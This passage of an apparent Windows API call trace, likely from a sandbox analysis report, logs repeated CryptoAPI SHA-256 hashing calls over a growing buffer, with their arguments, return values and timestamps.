CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.416] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c650, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c650, pdwDataLen=0x1ee448) returned 1 [0262.416] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.416] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.416] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.417] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.417] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x900, dwFlags=0x0) returned 1 [0262.417] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.417] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c680, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c680, pdwDataLen=0x1ee448) returned 1 [0262.417] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.417] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.417] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.418] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.418] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x920, dwFlags=0x0) returned 1 [0262.418] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.418] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c6b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c6b0, pdwDataLen=0x1ee448) returned 1 [0262.419] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.419] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.419] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.419] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.419] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x940, dwFlags=0x0) returned 1 [0262.419] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.419] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c6e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c6e0, pdwDataLen=0x1ee448) returned 1 [0262.419] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.419] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.419] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.420] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.420] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x960, dwFlags=0x0) returned 1 [0262.420] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.420] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c710, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c710, pdwDataLen=0x1ee448) returned 1 [0262.420] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.420] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.420] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.421] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.421] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x980, dwFlags=0x0) returned 1 [0262.421] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.421] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c740, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c740, pdwDataLen=0x1ee448) returned 1 [0262.421] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.421] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.421] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.422] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.422] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0262.422] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.422] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c770, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c770, pdwDataLen=0x1ee448) returned 1 [0262.422] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.422] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.422] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.423] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.423] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0262.423] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.423] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c7a0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c7a0, pdwDataLen=0x1ee448) returned 1 [0262.423] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.423] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.423] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.424] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.424] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0262.424] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.424] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c7d0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c7d0, pdwDataLen=0x1ee448) returned 1 [0262.424] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.424] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.424] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.424] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.424] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0262.425] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.425] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c800, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c800, pdwDataLen=0x1ee448) returned 1 [0262.425] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.425] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.425] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.425] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.425] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0262.425] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.425] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c830, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c830, pdwDataLen=0x1ee448) returned 1 [0262.425] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.425] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.426] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.426] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.426] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0262.426] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.426] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c860, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c860, pdwDataLen=0x1ee448) returned 1 [0262.426] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.426] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.426] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.427] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.427] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0262.427] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.427] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c890, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c890, pdwDataLen=0x1ee448) returned 1 [0262.427] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.427] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.427] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.428] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.428] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0262.428] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.428] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c8c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c8c0, pdwDataLen=0x1ee448) returned 1 [0262.428] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.428] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.428] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.429] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.429] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0262.429] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.429] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c8f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c8f0, pdwDataLen=0x1ee448) returned 1 [0262.429] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.429] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.429] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.429] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.430] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0262.430] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.430] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c920, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c920, pdwDataLen=0x1ee448) returned 1 [0262.430] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.430] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.430] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.430] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.430] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0262.430] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.430] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c950, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c950, pdwDataLen=0x1ee448) returned 1 [0262.430] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.430] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.431] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.431] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.431] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0262.431] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.431] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c980, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c980, pdwDataLen=0x1ee448) returned 1 [0262.431] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.431] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.431] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.432] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.432] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0262.432] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.432] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c230, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c230, pdwDataLen=0x1ee448) returned 1 [0262.432] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.432] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.432] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.433] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.433] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0262.433] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.433] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31ca00, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31ca00, pdwDataLen=0x1ee448) returned 1 [0262.434] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.434] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.434] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.434] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.434] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0262.434] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.434] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31ca60, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31ca60, pdwDataLen=0x1ee448) returned 1 [0262.434] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.434] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.434] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.435] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.435] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0262.435] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.435] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31ca90, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31ca90, pdwDataLen=0x1ee448) returned 1 [0262.435] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.435] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.435] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.436] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.436] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0262.436] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.436] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31cac0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31cac0, pdwDataLen=0x1ee448) returned 1 [0262.436] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.436] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.436] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.437] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.437] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0262.437] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.437] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31caf0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31caf0, pdwDataLen=0x1ee448) returned 1 [0262.437] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.437] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.437] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.438] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.438] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0262.438] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.438] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31cb20, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31cb20, pdwDataLen=0x1ee448) returned 1 [0262.438] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.438] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.438] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.438] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.438] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0262.438] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.438] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31cb50, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31cb50, pdwDataLen=0x1ee448) returned 1 [0262.439] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.439] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.439] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.439] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.439] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0262.439] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.439] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31cb80, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31cb80, pdwDataLen=0x1ee448) returned 1 [0262.439] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.439] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.439] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.440] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.440] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0262.440] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.440] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31cbb0, 